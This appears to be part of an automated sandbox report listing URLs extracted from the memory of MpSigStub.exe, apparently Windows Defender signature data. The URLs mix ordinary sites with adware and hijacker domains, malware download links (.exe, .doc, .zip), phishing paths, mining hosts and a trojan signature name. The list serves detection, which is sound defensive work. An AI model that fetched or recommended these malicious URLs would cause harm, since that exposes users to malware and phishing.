Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.safesear.ch/?type=201
Source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp String found in binary or memory: http://www.sagawa-exp.co.jp/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://www.satsokal.com/word.doc
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.sbcku.com/index.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.scan-dinavia-succession.com/kyqx7t6c/index.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.scanztech.com/wp-content/themes/twentytwelve/inc/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.se-beach-karting.at/overdue-payment/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.search-aid.com/search.php?qq=
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://www.search-and-find.netg
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.search.ask.com
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://www.searchmaid.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://www.searchult.com/?bd=sc&oem=
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://www.sectorappliance.com/qdewfww/kdjase.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://www.shadowmp3.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.shiyongsousuo.com
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.simplyinstaller.com/HtmlTemplates/finishPage.htmlx
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://www.sitem.biz/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.sjhomme.co.kr/images/admin.jpg
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.skkyc2004.cn
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.slotch.com/ist/softwares/v4.0/istdownload.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.smartpcfixer.com//
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.sogou.com/web?query=%s
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.sogou.com/web?sogouhome=&shuru=shou&query=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.solsub.com/jasso/hh/imagenes.html?
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://www.somegreatsongs.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: http://www.somegreatsongs.com/promo/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.soso.com/q?w=%s
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://www.speeditupfree.com
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://www.speeditupfree.comxA
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.sportscn.com/
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp String found in binary or memory: http://www.spyburner.com/activate.php?time=
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://www.spylocked.com/?
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://www.sqwire.com
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.sqwire.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiy
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.staging.pashminadevelopers.com/wp-admin/g_j/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://www.start-space.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.stimteam.co.za/images
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.stockstar.com/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.superpctools.com
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: http://www.support.me/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: http://www.supremocontrol.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://www.supremocontrol.com/a
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www.symantec.com
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.sync15.com/bizpolx.exe
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://www.systweak.com/registrycleaner
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://www.szhaokan.cn/welcome.php?k=
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://www.tagbao.com/open
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://www.taktuk.tk
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://www.tangosearch.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.tarazsystem.com/wp-admin/pl21.php)
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://www.tazbao.com/setup-
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.technologiesaintjoseph.com/uninstall.php?
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://www.tempuri.org/DataSet1.xsd
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://www.thebestofnet.com/exit/
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://www.thedomaindata.com/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://www.thehun.com/
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://www.thepitstopjohnstone.co.uk/invoice/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://www.thon-samson.be/js/_notes/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://www.tiandy.com/rechnung-
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://www.tibia.com/community/?subtopic=characters%26name=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.tiexue.net/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.tijuanalaw.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.tq121.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsim
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsimProgramFilesDir
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.traramayeri.net
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://www.trotux.com/?z=
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://www.tubedigger.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://www.tumbosco.com/order/p.o_76434.zip)
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://www.turtlecoin.lol
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.tvcodec.net/newest-codecpack.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://www.universal101.com/upd
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://www.update-srv.info
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://www.update-srv1.info
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp String found in binary or memory: http://www.usaa.com/inet/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.usatoday.com/search/results?q=
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://www.v9.com/v9tb/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.v9tr.com
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://www.virtrigger.com
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://www.virtrigger.coma
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://www.voxcards.com.br
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://www.wajam.com/webenhancer/logging
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://www.wajam.com/webenhancer/loggingxM
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.webflora.co.kr/slog/skin/setup.ini
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://www.webtreats.info/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.webye163.cn
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.win-spy.com/update
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://www.win-touch.com
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://www.windupdates.com
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: http://www.winferno.com/re/support.asp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.wintask16.com/exc2.txt
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://www.wisefixer.com/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://www.woothemes.com/flexslider/
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp String found in binary or memory: http://www.wordsmyth.net/cgi-bin/search.cgi
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.wosss.com/search.aspx?q=%s
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.wuweixian.com/we_down/k2_v/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://www.xiuzhe.com/ddvan.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://www.xpassgenerator.com/software/d
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.xpsecuritycenter.com/XPSecurityCenter/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.xupiter.com/d
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://www.xzwrn.cn/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://www.yessearches.com/?ts=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www.yfdc.com.tw/wp-content/uploads/2015/11/z.htm
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://www.yihaha.net/
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://www.yklbtrnklnbkjrnbjyrbnjka.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.yodao.com/search?ue=utf8&q=%s
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://www.youndoo.com/?z=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=Vjp7vgj119s
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=nqpod5at30g
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://www.ysbweb.com/ist/scripts/ysb_prompt.php?retry=2&loadfirst=1&delayload=0&software_id=10&acco
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.yuyu.com/?fav2
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://www.zabosaltd.biz/wafugi?id=COMPIDHERE&w=WEBMIDHERE&step=
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongsou.com/kefu/zskf.htm
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ziduscapital.com/en/_mmserverscripts/index.php?e=)
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.zixzelz1.narod.ru/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.znoo.net
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://www.zv05.com/sys2a
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.zxboy.com#http://
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://www1.yzsc.cn/cash
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www5.baidu.com/baidu?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www5.baidu.com/s?
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://www6.badesugerwakirpos.com/chr/907/nt.exe
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www6HSTR:Trojan:Win32/Stration.KFOP:Stration.encHSTR:TrojanDownloader:Win32/Stration_executeS
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://wwwwww.f2kk.cn
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://x0.nl/install/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://x01c4fr.sed.doormedic.com
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://x3redir.mooo.com?r=wmp&title=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://xinblasta.us/cj/siyrhz.doc
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://xisake.biz/control/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://xmr-services.com/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://xmr.enjoytopic.tk
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://xn----dtbhbqh9ajceeeg2m.org/components
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://xpressdelivery.ga/guangzhou/guangzhou2.html)
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://xupaeudenovo.net/net.jsp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://xx.522love.cn/tool/down
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://xxxlive.info/spot4
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8ar
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8he
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8qq
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8u9
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e9yp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/ecpx
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://y31uv4ra1.vo.llnwd.net/js/advancedmactuneup/macpro/mcprinfo.ini
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://yamaofficial.com/rxuczm/3415201.png
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://yasovetn1k.ru/files/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://yawaop.com/anna.doc
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://ydlevents.com.my/www/ucountredeem/php/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://yeabests.cc
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://ygsondheks.info/c/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://your_updater.com/privacy-policyso.html
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://youssef-tawil.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://yuksekovabali.com/rgvtr6wcaw2yyy6pkz6qvrj6)
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://yupsearch.com
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://yy.web1000wip.com:4567/bnb/css.js
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://z1.nf-2.net/512.txt
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://z360.net/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://z7v8.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: http://zaxarstore2.com/download.php
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.allgreathost.com
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage1.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage2.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage3.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.sisdotnet.com
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.xujace.com
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://zhsh.j.nj.twsapp.com
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://zief.pl/rc/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://zigyyt.com/trix.exe
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://zillot.kz/System/mysql/users.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://zlnewly.hk/fun.exe
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://zr.webhop.org:1337
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://zsxz.zhongsou.com/route/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://zxtenrnewlaunchinworldwide.mangospot.net/.-..................................................
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://zz.8282.space/nw/ss/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://zzease.com/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://zzobpk.ba/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: https://%s/ews/exchange.asmx
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/auth.owa
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/lang.owa
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/meetingpollhandler.ashx
